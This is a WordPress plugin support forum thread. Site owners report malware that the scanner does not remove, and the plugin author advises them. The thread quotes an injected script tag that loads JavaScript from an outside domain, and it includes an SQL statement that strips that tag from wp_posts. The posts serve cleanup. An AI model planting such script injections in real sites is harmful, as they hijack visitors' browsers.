Malware not removed

Viewing 9 replies - 1 through 9 (of 9 total)
  • Plugin Author Eli

    (@scheeeli)

    I just added this new threat to my definition updates so if you download the latest definitions then it should be able to fix this infection automatically.

    The complete scan should not take that long so either you have a lot of extra files/folders on your site or your server is really slow, or there is something else wrong. Be sure to deactivate and caching plugins while you are scanning your site. You could also try the Quick Scan on your Themes to fix this threat real quick but it might not work is your server has limited resources.

    Please let me know if you need more help.

    https://sitecheck.sucuri.net/results/vasaill.com
    me too….please help us…thanks

    Plugin Author Eli

    (@scheeeli)

    I just added this new threat to my definition updates, please download the latest definitions and then run the Complete Scan again. It should be able to find and fix this infection automatically now.

    If it does then please mark this topic “Resolved”, otherwise please let me know so that I can investigate further.

    It’s still here…please help us
    https://sitecheck.sucuri.net/results/karawalker.com.tw

    this javascript still under my website…it’s malmare…
    </div> <!– .et_pb_section –><script src=’https://hotopponents.site/site.js&#8217; type=’text/javascript’></script></p>

    Plugin Author Eli

    (@scheeeli)

    That remaining JavaScript looks like it is in your content (it was probably a direct SQL Injection) so you need to edit it out of the content of each page on your site. If you have access to PhPMyAdmin or another DB tool that can run SQL statements then you could try removing it with this SQL (Assuming your Posts Table uses the default name “wp_posts”, otherwise change that to match your table name):

    
UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://hotopponents.site/site.js' type='text/javascript'></script>", '') WHERE post_content LIKE '%<script src=\'https://hotopponents.site/site.js%></script>%'
    Thread Starter nikhilrj1

    (@nikhilrj1)

    My malware rogueads is removed. Thank you for your quick and great support. As you said, i had lot of files. That should be the reason for taking so much time.

    Hello!

    Delete code, but this code inject again and again, plugin not found this malware.

    Plugin Author Eli

    (@scheeeli)

    @vox-terman,
    This topic is resolved, maybe you have a different type of infection on your server. It probably would have been better if you had started a new threat for your issue but here’s the questions I have for you. What code are you deleting that my plug in is not finding?

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘Malware not removed’ is closed to new replies.